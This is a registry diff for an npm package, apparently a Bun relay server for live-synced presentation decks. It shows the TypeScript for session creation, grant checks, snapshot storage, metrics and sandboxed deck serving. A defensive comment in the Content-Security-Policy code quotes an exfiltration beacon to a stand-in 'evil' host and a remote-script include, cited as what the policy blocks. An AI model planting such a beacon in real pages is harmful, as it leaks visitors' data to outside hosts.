@liebstoeckel/present-relay 0.3.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +373 -0
- package/README.md +84 -0
- package/package.json +58 -0
- package/src/addressing.ts +37 -0
- package/src/auth.ts +28 -0
- package/src/cli.ts +111 -0
- package/src/grant.ts +63 -0
- package/src/index.ts +3 -0
- package/src/metrics.ts +152 -0
- package/src/relay-server.ts +546 -0
- package/src/tracing.ts +86 -0
|
@@ -0,0 +1,546 @@
|
|
|
1
|
+
import {
|
|
2
|
+
Hub,
|
|
3
|
+
createSession,
|
|
4
|
+
roleForToken,
|
|
5
|
+
injectBootstrap,
|
|
6
|
+
injectWatermark,
|
|
7
|
+
audienceScopeFromHtml,
|
|
8
|
+
type Peer,
|
|
9
|
+
type PeerRole,
|
|
10
|
+
type Role,
|
|
11
|
+
type Session,
|
|
12
|
+
} from "@liebstoeckel/live-server";
|
|
13
|
+
import { bearer, matchAccount, safeEqual } from "./auth";
|
|
14
|
+
import { mintGrant, verifyGrant } from "./grant";
|
|
15
|
+
import { createRelayMetrics } from "./metrics";
|
|
16
|
+
import { withSpan, SpanKind, ctxFromHeaders } from "./tracing";
|
|
17
|
+
|
|
18
|
+
/** Templated path for relay span names, collapse session ids so the span name stays bounded
|
|
19
|
+
* (`/sync/<id>` → `/sync/:id`), the trace-name equivalent of the metric cardinality rule. */
|
|
20
|
+
function tracePath(pathname: string): string {
|
|
21
|
+
return pathname
|
|
22
|
+
.replace(/^\/api\/sessions\/[^/]+/, "/api/sessions/:id")
|
|
23
|
+
.replace(/^\/(s|sync)\/[^/]+/, "/$1/:id");
|
|
24
|
+
}
|
|
25
|
+
|
|
26
|
+
/** Pluggable object storage for session snapshots (ADR 0061). The hosted deploy wires
|
|
27
|
+
* a Bun S3 client; the core stays storage-agnostic + testable. */
|
|
28
|
+
export interface RelayStorage {
|
|
29
|
+
get(key: string): Promise<Uint8Array | null>;
|
|
30
|
+
put(key: string, bytes: Uint8Array): Promise<void>;
|
|
31
|
+
}
|
|
32
|
+
|
|
33
|
+
export interface RelayOptions {
|
|
34
|
+
/** pre-shared account API tokens; a POST must present one as `Bearer` */
|
|
35
|
+
accountTokens: readonly string[];
|
|
36
|
+
port?: number;
|
|
37
|
+
hostname?: string;
|
|
38
|
+
/** public base URL for the links we hand back (e.g. https://relay.example).
|
|
39
|
+
* Omitted → derived from the request (honors x-forwarded-proto/host). */
|
|
40
|
+
publicBaseUrl?: string;
|
|
41
|
+
/** max uploaded deck size (bytes) */
|
|
42
|
+
maxDeckBytes?: number;
|
|
43
|
+
/** max concurrent sessions per account */
|
|
44
|
+
maxSessionsPerAccount?: number;
|
|
45
|
+
/** session lifetime; the doc + tokens are dropped after this */
|
|
46
|
+
sessionTtlMs?: number;
|
|
47
|
+
/** inbound WS frame cap */
|
|
48
|
+
maxFrameBytes?: number;
|
|
49
|
+
/** keepalive period for each session Hub */
|
|
50
|
+
keepaliveMs?: number;
|
|
51
|
+
/** object storage for session snapshots (ADR 0061). Sessions created with an
|
|
52
|
+
* `x-snapshot-key` header are seeded from it on create and snapshotted to it on a
|
|
53
|
+
* timer + on end; absent → no persistence (the trusted/transient relay). */
|
|
54
|
+
storage?: RelayStorage;
|
|
55
|
+
/** snapshot debounce period (ms) for persisted sessions. */
|
|
56
|
+
snapshotMs?: number;
|
|
57
|
+
/** per-audience-peer write rate (enforced sessions). */
|
|
58
|
+
audienceRate?: { capacity: number; refillPerSec: number };
|
|
59
|
+
/** image tag for the `liebstoeckel_relay_build_info` metric (ADR 0073). */
|
|
60
|
+
version?: string;
|
|
61
|
+
}
|
|
62
|
+
|
|
63
|
+
interface RelaySession {
|
|
64
|
+
id: string;
|
|
65
|
+
account: string;
|
|
66
|
+
hub: Hub;
|
|
67
|
+
/** the built deck HTML (no bootstrap yet, injected per request) */
|
|
68
|
+
html: string;
|
|
69
|
+
session: Session;
|
|
70
|
+
/** privileged peer token: the local deck-runner that applies server-plugin effects */
|
|
71
|
+
runnerToken: string;
|
|
72
|
+
createdAt: number;
|
|
73
|
+
/** effective lifetime (ms), the plan duration for hosted sessions (ADR 0061),
|
|
74
|
+
* else the relay default. */
|
|
75
|
+
ttlMs: number;
|
|
76
|
+
/** hosted live (ADR 0061): write-scope enforce audience peers. */
|
|
77
|
+
enforce: boolean;
|
|
78
|
+
/** max concurrent audience peers (plan's liveAudienceCap); undefined = uncapped. */
|
|
79
|
+
audienceCap?: number;
|
|
80
|
+
/** current connected audience peers (for the cap). */
|
|
81
|
+
audienceCount: number;
|
|
82
|
+
/** show the "Published with liebstoeckel" provenance badge (free tier; ADR 0061). */
|
|
83
|
+
watermark: boolean;
|
|
84
|
+
/** object-storage key for this session's Yjs snapshot, if persisted. */
|
|
85
|
+
snapshotKey?: string;
|
|
86
|
+
ttl?: ReturnType<typeof setTimeout>;
|
|
87
|
+
snap?: ReturnType<typeof setInterval>;
|
|
88
|
+
}
|
|
89
|
+
|
|
90
|
+
export interface RelayServer {
|
|
91
|
+
port: number;
|
|
92
|
+
baseUrl: string;
|
|
93
|
+
sessions: Map<string, RelaySession>;
|
|
94
|
+
/** operational counters (ADR 0061 / ticket 0015), snapshot write failures so a
|
|
95
|
+
* silently-lost result surfaces in logs/metrics instead of vanishing. */
|
|
96
|
+
stats(): { snapshotFailures: number };
|
|
97
|
+
/** Flush every active session's final snapshot, then tear down. Awaitable so a
|
|
98
|
+
* SIGTERM handler can guarantee the writes land before the process exits
|
|
99
|
+
* (ADR 0071 §5 / ticket 0018, the racy fire-and-forget path lost results). */
|
|
100
|
+
stop(): Promise<void>;
|
|
101
|
+
}
|
|
102
|
+
|
|
103
|
+
type WSData = { sessionId: string; peer: Peer | null; role: PeerRole };
|
|
104
|
+
|
|
105
|
+
const hex = (bytes = 16): string => {
|
|
106
|
+
const a = new Uint8Array(bytes);
|
|
107
|
+
crypto.getRandomValues(a);
|
|
108
|
+
return Array.from(a, (b) => b.toString(16).padStart(2, "0")).join("");
|
|
109
|
+
};
|
|
110
|
+
|
|
111
|
+
const DEFAULTS = {
|
|
112
|
+
maxDeckBytes: 8 * 1024 * 1024,
|
|
113
|
+
// Per-pod safety valve, NOT the platform ceiling (ADR 0071 §2 / ticket 0017): real
|
|
114
|
+
// concurrency is gated by per-org entitlements + per-pod capacity in the control
|
|
115
|
+
// plane's choosePod, and sessions spread across the StatefulSet's pods. This just
|
|
116
|
+
// backstops a single pod's RAM.
|
|
117
|
+
maxSessionsPerAccount: 200,
|
|
118
|
+
sessionTtlMs: 6 * 60 * 60 * 1000,
|
|
119
|
+
maxFrameBytes: 4 * 1024 * 1024,
|
|
120
|
+
keepaliveMs: 25_000,
|
|
121
|
+
snapshotMs: 20_000,
|
|
122
|
+
audienceRate: { capacity: 20, refillPerSec: 5 },
|
|
123
|
+
};
|
|
124
|
+
|
|
125
|
+
/** Resolve the public http/ws origins for the links we return. */
|
|
126
|
+
function originOf(req: Request, opts: RelayOptions): { http: string; ws: string } {
|
|
127
|
+
if (opts.publicBaseUrl) {
|
|
128
|
+
const b = opts.publicBaseUrl.replace(/\/$/, "");
|
|
129
|
+
return { http: b, ws: b.replace(/^http/i, "ws") };
|
|
130
|
+
}
|
|
131
|
+
const url = new URL(req.url);
|
|
132
|
+
const proto = req.headers.get("x-forwarded-proto") ?? (url.protocol === "https:" ? "https" : "http");
|
|
133
|
+
const host = req.headers.get("x-forwarded-host") ?? url.host;
|
|
134
|
+
return { http: `${proto}://${host}`, ws: `${proto === "https" ? "wss" : "ws"}://${host}` };
|
|
135
|
+
}
|
|
136
|
+
|
|
137
|
+
const json = (body: unknown, status = 200): Response =>
|
|
138
|
+
new Response(JSON.stringify(body), { status, headers: { "content-type": "application/json" } });
|
|
139
|
+
|
|
140
|
+
/** Resolve a session's role for a token: presenter/viewer (public) or runner
|
|
141
|
+
* (the privileged deck-runner peer). null = deny. */
|
|
142
|
+
function relayRole(s: RelaySession, token: string | null): Role | "runner" | null {
|
|
143
|
+
if (!token) return null;
|
|
144
|
+
if (safeEqual(s.runnerToken, token)) return "runner";
|
|
145
|
+
return roleForToken(s.session, token);
|
|
146
|
+
}
|
|
147
|
+
|
|
148
|
+
/** Resolve a connection's role from `?t=…`, preferring a **signed grant** (ADR 0061):
|
|
149
|
+
* the control plane mints presenter/viewer grants the relay verifies statelessly with
|
|
150
|
+
* the session's account token, no per-session token lookup. Falls back to the raw
|
|
151
|
+
* session tokens (CLI presenter/viewer) and the runner token. null = deny. */
|
|
152
|
+
function resolveRole(s: RelaySession, token: string | null, now: number): Role | "runner" | null {
|
|
153
|
+
if (!token) return null;
|
|
154
|
+
const g = verifyGrant(token, s.account, now);
|
|
155
|
+
if (g && g.session === s.id && (g.role === "presenter" || g.role === "viewer")) return g.role;
|
|
156
|
+
return relayRole(s, token);
|
|
157
|
+
}
|
|
158
|
+
|
|
159
|
+
/** A public relay: account-token-gated deck upload, opaque-origin deck serving,
|
|
160
|
+
* and a token-gated Yjs WebSocket per session. Decks run their code locally (the
|
|
161
|
+
* runner connects as a privileged peer); the relay only relays + serves bytes. */
|
|
162
|
+
export function createRelay(opts: RelayOptions): RelayServer {
|
|
163
|
+
const cfg = { ...DEFAULTS, ...opts };
|
|
164
|
+
if (!opts.accountTokens.length) throw new Error("createRelay: at least one account token is required");
|
|
165
|
+
const sessions = new Map<string, RelaySession>();
|
|
166
|
+
let snapshotFailures = 0;
|
|
167
|
+
// Process start time, reported in /stats so the reconciler can tell when a pod has
|
|
168
|
+
// RESTARTED (same name, fresh memory) and re-provision sessions it lost, not just when
|
|
169
|
+
// a pod is gone (ADR 0071 §5 / ticket 0018+0019).
|
|
170
|
+
const startedAt = Date.now();
|
|
171
|
+
// Drain flag (ADR 0071 §4 / ticket 0019): the reconciler cordons a pod (POST /cordon)
|
|
172
|
+
// to stop NEW placement while existing sessions finish. Reported in /stats so the
|
|
173
|
+
// control plane's choosePod skips it; in-memory, so a recreated pod starts uncordoned.
|
|
174
|
+
let cordoned = false;
|
|
175
|
+
|
|
176
|
+
// Metrics (ADR 0073 / ticket 0023). Per-instance registry; scrape-time gauges are read
|
|
177
|
+
// from the live `sessions` map. Served bearer-gated at GET /metrics below.
|
|
178
|
+
const metrics = createRelayMetrics(opts.version ?? process.env.PRESENT_RELAY_VERSION ?? "unknown");
|
|
179
|
+
metrics.registry.onCollect(() => {
|
|
180
|
+
let audience = 0;
|
|
181
|
+
let deckBytes = 0;
|
|
182
|
+
for (const s of sessions.values()) {
|
|
183
|
+
audience += s.audienceCount;
|
|
184
|
+
deckBytes += Buffer.byteLength(s.html, "utf8");
|
|
185
|
+
}
|
|
186
|
+
metrics.sessions.set(sessions.size);
|
|
187
|
+
metrics.audiencePeers.set(audience);
|
|
188
|
+
metrics.deckBytes.set(deckBytes);
|
|
189
|
+
metrics.cordoned.set(cordoned ? 1 : 0);
|
|
190
|
+
metrics.startedAt.set(Math.floor(startedAt / 1000));
|
|
191
|
+
});
|
|
192
|
+
|
|
193
|
+
const persist = async (s: RelaySession) => {
|
|
194
|
+
if (!cfg.storage || !s.snapshotKey) return;
|
|
195
|
+
metrics.snapshotWrites.inc();
|
|
196
|
+
try {
|
|
197
|
+
await cfg.storage.put(s.snapshotKey, s.hub.snapshot());
|
|
198
|
+
} catch (e) {
|
|
199
|
+
// Best-effort: a failed write must never crash the relay, but it must NOT be
|
|
200
|
+
// silent (results would vanish). Structured log + a counter (ADR 0061).
|
|
201
|
+
snapshotFailures++;
|
|
202
|
+
metrics.snapshotFailures.inc();
|
|
203
|
+
console.error(
|
|
204
|
+
JSON.stringify({ level: "error", msg: "relay snapshot persist failed", key: s.snapshotKey, err: String(e) }),
|
|
205
|
+
);
|
|
206
|
+
}
|
|
207
|
+
};
|
|
208
|
+
|
|
209
|
+
const dropSession = (s: RelaySession) => {
|
|
210
|
+
if (s.ttl) clearTimeout(s.ttl);
|
|
211
|
+
if (s.snap) clearInterval(s.snap);
|
|
212
|
+
sessions.delete(s.id);
|
|
213
|
+
// Snapshot the final state before tearing down the doc (results survive, ADR 0061).
|
|
214
|
+
void persist(s).finally(() => s.hub.destroy());
|
|
215
|
+
};
|
|
216
|
+
|
|
217
|
+
// POST /api/sessions, create a live session from an uploaded deck (ADR 0061). A closure over
|
|
218
|
+
// cfg/sessions/metrics/persist/dropSession; returns the session-info JSON, or a reject response
|
|
219
|
+
// (401/503/413/400/429) with the matching metric incremented.
|
|
220
|
+
const handleCreateSession = async (req: Request): Promise<Response> => {
|
|
221
|
+
const account = matchAccount(cfg.accountTokens, bearer(req));
|
|
222
|
+
if (!account) {
|
|
223
|
+
metrics.sessionRejects.inc({ reason: "unauthorized" });
|
|
224
|
+
return json({ error: "unauthorized" }, 401);
|
|
225
|
+
}
|
|
226
|
+
// Cordoned pods take no new sessions, a backstop; placement already skips us.
|
|
227
|
+
if (cordoned) {
|
|
228
|
+
metrics.sessionRejects.inc({ reason: "cordoned" });
|
|
229
|
+
return json({ error: "relay draining" }, 503);
|
|
230
|
+
}
|
|
231
|
+
|
|
232
|
+
const declared = Number(req.headers.get("content-length") ?? "0");
|
|
233
|
+
if (declared > cfg.maxDeckBytes) {
|
|
234
|
+
metrics.sessionRejects.inc({ reason: "too_large" });
|
|
235
|
+
return json({ error: "deck too large" }, 413);
|
|
236
|
+
}
|
|
237
|
+
const html = await req.text();
|
|
238
|
+
if (Buffer.byteLength(html, "utf8") > cfg.maxDeckBytes) {
|
|
239
|
+
metrics.sessionRejects.inc({ reason: "too_large" });
|
|
240
|
+
return json({ error: "deck too large" }, 413);
|
|
241
|
+
}
|
|
242
|
+
if (!html.trim()) {
|
|
243
|
+
metrics.sessionRejects.inc({ reason: "empty" });
|
|
244
|
+
return json({ error: "empty deck" }, 400);
|
|
245
|
+
}
|
|
246
|
+
|
|
247
|
+
const count = [...sessions.values()].filter((s) => s.account === account).length;
|
|
248
|
+
if (count >= cfg.maxSessionsPerAccount) {
|
|
249
|
+
metrics.sessionRejects.inc({ reason: "quota" });
|
|
250
|
+
return json({ error: "session quota reached" }, 429);
|
|
251
|
+
}
|
|
252
|
+
|
|
253
|
+
// Hosted live (ADR 0061): the control plane opts a session into audience
|
|
254
|
+
// write-scope enforcement (scope read from the deck's own embedded manifest)
|
|
255
|
+
// and names the object-storage key its Yjs snapshot persists to.
|
|
256
|
+
const enforce = req.headers.get("x-live-enforce") === "1";
|
|
257
|
+
const snapshotKey = req.headers.get("x-snapshot-key") || undefined;
|
|
258
|
+
// Plan limits the control plane passes per session (ADR 0061): the duration
|
|
259
|
+
// (so a free session's link dies on time, not at the relay's 6h default) and
|
|
260
|
+
// the audience cap. TTL is clamped to the relay max; absent → relay default.
|
|
261
|
+
const reqTtl = Number(req.headers.get("x-session-ttl-ms") ?? "");
|
|
262
|
+
const ttlMs = Number.isFinite(reqTtl) && reqTtl > 0 ? Math.min(reqTtl, cfg.sessionTtlMs) : cfg.sessionTtlMs;
|
|
263
|
+
const capHdr = Number(req.headers.get("x-audience-cap") ?? "");
|
|
264
|
+
const audienceCap = Number.isFinite(capHdr) && capHdr > 0 ? capHdr : undefined;
|
|
265
|
+
const watermark = req.headers.get("x-watermark") === "1";
|
|
266
|
+
// Stable session id across re-provision (ADR 0072): the control plane re-creates
|
|
267
|
+
// a recovered session under the SAME id on a new pod, so the audience URL
|
|
268
|
+
// (`/s/<id>?t=<grant>`) and its stateless grant stay valid, only the pod the
|
|
269
|
+
// multi-layer ForwardAuth route resolves to changes. Absent (CLI) → relay mints one.
|
|
270
|
+
const providedId = (req.headers.get("x-session-id") || "").trim() || undefined;
|
|
271
|
+
|
|
272
|
+
const session = createSession();
|
|
273
|
+
if (providedId) {
|
|
274
|
+
// A stale entry under this id (re-provision raced its predecessor's teardown)
|
|
275
|
+
// is dropped + snapshotted first so the fresh, re-seeded one wins.
|
|
276
|
+
const stale = sessions.get(providedId);
|
|
277
|
+
if (stale) dropSession(stale);
|
|
278
|
+
session.id = providedId;
|
|
279
|
+
}
|
|
280
|
+
const hub = new Hub({
|
|
281
|
+
keepaliveMs: cfg.keepaliveMs,
|
|
282
|
+
audience: enforce ? { scope: audienceScopeFromHtml(html), rate: cfg.audienceRate } : undefined,
|
|
283
|
+
});
|
|
284
|
+
// Re-seed from a prior snapshot if one exists (relay restart / reconnect).
|
|
285
|
+
if (cfg.storage && snapshotKey) {
|
|
286
|
+
try {
|
|
287
|
+
const prior = await cfg.storage.get(snapshotKey);
|
|
288
|
+
if (prior) {
|
|
289
|
+
hub.seed(prior);
|
|
290
|
+
metrics.snapshotSeed.inc({ result: "hit" });
|
|
291
|
+
} else {
|
|
292
|
+
metrics.snapshotSeed.inc({ result: "miss" });
|
|
293
|
+
}
|
|
294
|
+
} catch {
|
|
295
|
+
/* no prior snapshot / unreadable → start fresh */
|
|
296
|
+
metrics.snapshotSeed.inc({ result: "error" });
|
|
297
|
+
}
|
|
298
|
+
}
|
|
299
|
+
const rs: RelaySession = {
|
|
300
|
+
id: session.id,
|
|
301
|
+
account,
|
|
302
|
+
hub,
|
|
303
|
+
html,
|
|
304
|
+
session,
|
|
305
|
+
runnerToken: hex(),
|
|
306
|
+
createdAt: Date.now(),
|
|
307
|
+
ttlMs,
|
|
308
|
+
enforce,
|
|
309
|
+
audienceCap,
|
|
310
|
+
audienceCount: 0,
|
|
311
|
+
watermark,
|
|
312
|
+
snapshotKey,
|
|
313
|
+
};
|
|
314
|
+
rs.ttl = setTimeout(() => dropSession(rs), ttlMs);
|
|
315
|
+
(rs.ttl as { unref?: () => void }).unref?.();
|
|
316
|
+
if (cfg.storage && snapshotKey) {
|
|
317
|
+
rs.snap = setInterval(() => void persist(rs), cfg.snapshotMs);
|
|
318
|
+
(rs.snap as { unref?: () => void }).unref?.();
|
|
319
|
+
}
|
|
320
|
+
sessions.set(rs.id, rs);
|
|
321
|
+
metrics.sessionCreates.inc();
|
|
322
|
+
|
|
323
|
+
// Mint signed, expiring presenter/viewer grants (ADR 0061), the links carry
|
|
324
|
+
// these, and the relay verifies them statelessly with the account token; no
|
|
325
|
+
// per-session token is stored client-side. (Raw tokens are still returned for
|
|
326
|
+
// CLI/runner back-compat.)
|
|
327
|
+
const exp = rs.createdAt + ttlMs;
|
|
328
|
+
const presenterGrant = mintGrant({ session: rs.id, role: "presenter", exp }, account);
|
|
329
|
+
const viewerGrant = mintGrant({ session: rs.id, role: "viewer", exp }, account);
|
|
330
|
+
|
|
331
|
+
const { http, ws } = originOf(req, opts);
|
|
332
|
+
return json({
|
|
333
|
+
id: rs.id,
|
|
334
|
+
presenterToken: session.presenterToken,
|
|
335
|
+
viewerToken: session.viewerToken,
|
|
336
|
+
runnerToken: rs.runnerToken,
|
|
337
|
+
presenterGrant,
|
|
338
|
+
viewerGrant,
|
|
339
|
+
expiresAt: exp,
|
|
340
|
+
urls: {
|
|
341
|
+
presenter: `${http}/s/${rs.id}?t=${presenterGrant}`,
|
|
342
|
+
viewer: `${http}/s/${rs.id}?t=${viewerGrant}`,
|
|
343
|
+
sync: `${ws}/sync/${rs.id}`,
|
|
344
|
+
},
|
|
345
|
+
});
|
|
346
|
+
};
|
|
347
|
+
|
|
348
|
+
// GET /s/:id, serve the deck to a grant-bearing presenter/viewer in an opaque sandbox
|
|
349
|
+
// (ADR 0014/0069). A closure over sessions; returns the sandboxed HTML, or a 403 on a
|
|
350
|
+
// missing/invalid/expired grant (runner tokens are WS-only and may not load the page).
|
|
351
|
+
const serveDeck = (req: Request, url: URL, id: string): Response => {
|
|
352
|
+
const s = sessions.get(id);
|
|
353
|
+
const token = url.searchParams.get("t");
|
|
354
|
+
const role = s ? resolveRole(s, token, Date.now()) : null;
|
|
355
|
+
if (!s || !role || role === "runner" || !token) {
|
|
356
|
+
metrics.grantDenials.inc();
|
|
357
|
+
return new Response("Invalid or expired link.", { status: 403 });
|
|
358
|
+
}
|
|
359
|
+
const { http, ws } = originOf(req, opts);
|
|
360
|
+
const wsUrl = `${ws}/sync/${s.id}?t=${token}`;
|
|
361
|
+
const viewer = `${http}/s/${s.id}?t=${s.session.viewerToken}`;
|
|
362
|
+
// Free-tier provenance badge on the public audience view (ADR 0061); paid
|
|
363
|
+
// (white-label) sessions omit it. Presenter view is never watermarked.
|
|
364
|
+
const html = s.watermark && role === "viewer" ? injectWatermark(s.html) : s.html;
|
|
365
|
+
const body = injectBootstrap(html, { ws: wsUrl, session: s.id, role, token, participant: "", viewer });
|
|
366
|
+
return new Response(body, {
|
|
367
|
+
headers: {
|
|
368
|
+
"content-type": "text/html; charset=utf-8",
|
|
369
|
+
// Opaque-origin isolation: no allow-same-origin → the deck can't reach
|
|
370
|
+
// the relay's cookies/API/DOM, and each load is a fresh opaque origin
|
|
371
|
+
// (deck-to-deck isolation). connect-src pins the live socket to us.
|
|
372
|
+
// `allow-popups` enables the presenter pop-out (P → window.open of
|
|
373
|
+
// /s/:id?t=<presenterToken>#presenter), the popup is itself served
|
|
374
|
+
// sandboxed by the relay and syncs through the Hub, so isolation holds
|
|
375
|
+
// (ADR 0014). Without it window.open throws in the sandbox.
|
|
376
|
+
// `allow-fullscreen` is NOT a valid CSP `sandbox` token (it's an
|
|
377
|
+
// iframe/Permissions-Policy feature), browsers reject it and log a
|
|
378
|
+
// console error. Fullscreen for this top-level doc is governed by the
|
|
379
|
+
// Fullscreen API / Permissions-Policy, not the sandbox directive.
|
|
380
|
+
//
|
|
381
|
+
// `default-src 'none'` + a single-file allowlist (ADR 0069): a deck
|
|
382
|
+
// inlines all assets (ADR 0001), so it needs zero external origins, // this blocks remote code (`<script src=evil>`) and GET-beacon exfil
|
|
383
|
+
// (`new Image().src='https://evil/?x'`) that `connect-src` can't pin.
|
|
384
|
+
// Mirrors the dashboard's static-share CSP, but keeps `connect-src`
|
|
385
|
+
// to our sync socket and `allow-popups` for the presenter pop-out.
|
|
386
|
+
"content-security-policy": `default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data: blob:; font-src data:; media-src data: blob:; connect-src ${ws} ${http}; frame-ancestors 'none'; sandbox allow-scripts allow-popups`,
|
|
387
|
+
"x-content-type-options": "nosniff",
|
|
388
|
+
"referrer-policy": "no-referrer",
|
|
389
|
+
},
|
|
390
|
+
});
|
|
391
|
+
};
|
|
392
|
+
|
|
393
|
+
// HTTP dispatcher, a closure (keeps access to sessions/cfg/cordoned), wrapped in a SERVER span
|
|
394
|
+
// by the Bun.serve `fetch` below. Returns a Response, or undefined for a successful WebSocket
|
|
395
|
+
// upgrade (Bun's hold-the-socket signal). The two fat routes live in their own closures above;
|
|
396
|
+
// the small infra/control + connect routes stay inline.
|
|
397
|
+
const handleFetch = async (req: Request, srv: Bun.Server<WSData>): Promise<Response | undefined> => {
|
|
398
|
+
const url = new URL(req.url);
|
|
399
|
+
const { pathname } = url;
|
|
400
|
+
|
|
401
|
+
if (pathname === "/healthz") return new Response("ok");
|
|
402
|
+
|
|
403
|
+
// --- fleet stats: this pod's live load, for control-plane placement (ADR 0071 §2). ---
|
|
404
|
+
// Account-gated, the per-pod Ingress makes it publicly reachable.
|
|
405
|
+
if (pathname === "/stats") {
|
|
406
|
+
if (!matchAccount(cfg.accountTokens, bearer(req))) return json({ error: "unauthorized" }, 401);
|
|
407
|
+
return json({ ok: true, sessions: sessions.size, cordoned, startedAt });
|
|
408
|
+
}
|
|
409
|
+
|
|
410
|
+
// --- Prometheus metrics: this pod's logical state (ADR 0073). Account-gated like /stats, so
|
|
411
|
+
// the bearer keeps it off the public surface; Alloy scrapes it on the pod network. ---
|
|
412
|
+
if (pathname === "/metrics") {
|
|
413
|
+
if (!matchAccount(cfg.accountTokens, bearer(req))) return new Response("unauthorized", { status: 401 });
|
|
414
|
+
return new Response(metrics.registry.render(), {
|
|
415
|
+
headers: { "content-type": "text/plain; version=0.0.4; charset=utf-8" },
|
|
416
|
+
});
|
|
417
|
+
}
|
|
418
|
+
|
|
419
|
+
// --- drain control: cordon/uncordon this pod (reconciler only, ADR 0071 §4). Cordoned →
|
|
420
|
+
// refuse NEW sessions; existing run to completion. `{ "cordoned": false }` lifts it. ---
|
|
421
|
+
if (pathname === "/cordon" && req.method === "POST") {
|
|
422
|
+
if (!matchAccount(cfg.accountTokens, bearer(req))) return json({ error: "unauthorized" }, 401);
|
|
423
|
+
const body = (await req.json().catch(() => ({}))) as { cordoned?: boolean };
|
|
424
|
+
cordoned = body.cordoned !== false;
|
|
425
|
+
return json({ ok: true, cordoned });
|
|
426
|
+
}
|
|
427
|
+
|
|
428
|
+
// --- control API: create / end a session (ADR 0061). ---
|
|
429
|
+
if (pathname === "/api/sessions" && req.method === "POST") return handleCreateSession(req);
|
|
430
|
+
const del = pathname.match(/^\/api\/sessions\/([^/]+)$/);
|
|
431
|
+
if (del && req.method === "DELETE") {
|
|
432
|
+
const account = matchAccount(cfg.accountTokens, bearer(req));
|
|
433
|
+
if (!account) return json({ error: "unauthorized" }, 401);
|
|
434
|
+
const s = sessions.get(del[1]!);
|
|
435
|
+
if (!s || s.account !== account) return json({ error: "not found" }, 404);
|
|
436
|
+
dropSession(s);
|
|
437
|
+
return new Response(null, { status: 204 });
|
|
438
|
+
}
|
|
439
|
+
|
|
440
|
+
// --- WebSocket sync: audience/presenter connect (ADR 0061). ---
|
|
441
|
+
const sync = pathname.match(/^\/sync\/([^/]+)$/);
|
|
442
|
+
if (sync) {
|
|
443
|
+
const s = sessions.get(sync[1]!);
|
|
444
|
+
const relRole = s ? resolveRole(s, url.searchParams.get("t"), Date.now()) : null;
|
|
445
|
+
if (!s || !relRole) {
|
|
446
|
+
metrics.grantDenials.inc();
|
|
447
|
+
return new Response("forbidden", { status: 403 });
|
|
448
|
+
}
|
|
449
|
+
// viewer → audience (write-scope enforced when the session opted in);
|
|
450
|
+
// presenter + runner are trusted writers.
|
|
451
|
+
const role: PeerRole = relRole === "viewer" ? "audience" : "presenter";
|
|
452
|
+
// Enforce the plan's audience cap (ADR 0061), presenter/runner never count.
|
|
453
|
+
if (role === "audience" && s.audienceCap !== undefined && s.audienceCount >= s.audienceCap) {
|
|
454
|
+
metrics.audienceCapRejects.inc();
|
|
455
|
+
return new Response("audience full", { status: 503 });
|
|
456
|
+
}
|
|
457
|
+
const data: WSData = { sessionId: s.id, peer: null, role };
|
|
458
|
+
return srv.upgrade(req, { data }) ? undefined : new Response("upgrade failed", { status: 400 });
|
|
459
|
+
}
|
|
460
|
+
|
|
461
|
+
// --- serve the deck in an opaque sandbox (ADR 0014/0069). ---
|
|
462
|
+
const serve = pathname.match(/^\/s\/([^/]+)$/);
|
|
463
|
+
if (serve) return serveDeck(req, url, serve[1]!);
|
|
464
|
+
|
|
465
|
+
return new Response("not found", { status: 404 });
|
|
466
|
+
};
|
|
467
|
+
|
|
468
|
+
const server = Bun.serve<WSData>({
|
|
469
|
+
port: opts.port ?? 0,
|
|
470
|
+
hostname: opts.hostname ?? "0.0.0.0",
|
|
471
|
+
// OSS-safe ingress tracing: gated by OTEL_EXPORTER_OTLP_ENDPOINT (a no-op with NO egress when
|
|
472
|
+
// unset, a standalone/offline relay emits nothing). A SERVER span continuing the inbound W3C
|
|
473
|
+
// traceparent so the relay JOINS the trace: control → relay (session create) and the audience
|
|
474
|
+
// traefik → relay path. Infra/control paths (probes, scrapes, cordon) are not traced.
|
|
475
|
+
fetch(req, srv) {
|
|
476
|
+
const { pathname } = new URL(req.url);
|
|
477
|
+
if (pathname === "/healthz" || pathname === "/stats" || pathname === "/metrics" || pathname === "/cordon") {
|
|
478
|
+
return handleFetch(req, srv);
|
|
479
|
+
}
|
|
480
|
+
return withSpan(
|
|
481
|
+
`relay ${req.method} ${tracePath(pathname)}`,
|
|
482
|
+
ctxFromHeaders(req.headers),
|
|
483
|
+
{ "http.request.method": req.method, "url.path": pathname },
|
|
484
|
+
() => handleFetch(req, srv),
|
|
485
|
+
SpanKind.SERVER,
|
|
486
|
+
);
|
|
487
|
+
},
|
|
488
|
+
websocket: {
|
|
489
|
+
idleTimeout: 120,
|
|
490
|
+
maxPayloadLength: cfg.maxFrameBytes,
|
|
491
|
+
open(socket) {
|
|
492
|
+
const s = sessions.get(socket.data.sessionId);
|
|
493
|
+
if (!s) {
|
|
494
|
+
socket.close();
|
|
495
|
+
return;
|
|
496
|
+
}
|
|
497
|
+
if (socket.data.role === "audience") s.audienceCount++;
|
|
498
|
+
metrics.wsOpens.inc({ role: socket.data.role });
|
|
499
|
+
metrics.wsConnections.inc({ role: socket.data.role });
|
|
500
|
+
socket.data.peer = s.hub.join((d) => {
|
|
501
|
+
metrics.wsFrames.inc({ dir: "out" });
|
|
502
|
+
metrics.wsBytes.inc({ dir: "out" }, d.byteLength);
|
|
503
|
+
socket.send(d);
|
|
504
|
+
}, socket.data.role);
|
|
505
|
+
},
|
|
506
|
+
message(socket, msg) {
|
|
507
|
+
if (typeof msg === "string") return;
|
|
508
|
+
const bytes = new Uint8Array(msg as unknown as ArrayBufferLike);
|
|
509
|
+
if (bytes.byteLength > cfg.maxFrameBytes) return;
|
|
510
|
+
metrics.wsFrames.inc({ dir: "in" });
|
|
511
|
+
metrics.wsBytes.inc({ dir: "in" }, bytes.byteLength);
|
|
512
|
+
socket.data.peer?.recv(bytes);
|
|
513
|
+
},
|
|
514
|
+
close(socket) {
|
|
515
|
+
socket.data.peer?.leave();
|
|
516
|
+
metrics.wsCloses.inc({ role: socket.data.role });
|
|
517
|
+
metrics.wsConnections.dec({ role: socket.data.role });
|
|
518
|
+
const s = sessions.get(socket.data.sessionId);
|
|
519
|
+
if (s && socket.data.role === "audience" && s.audienceCount > 0) s.audienceCount--;
|
|
520
|
+
},
|
|
521
|
+
},
|
|
522
|
+
});
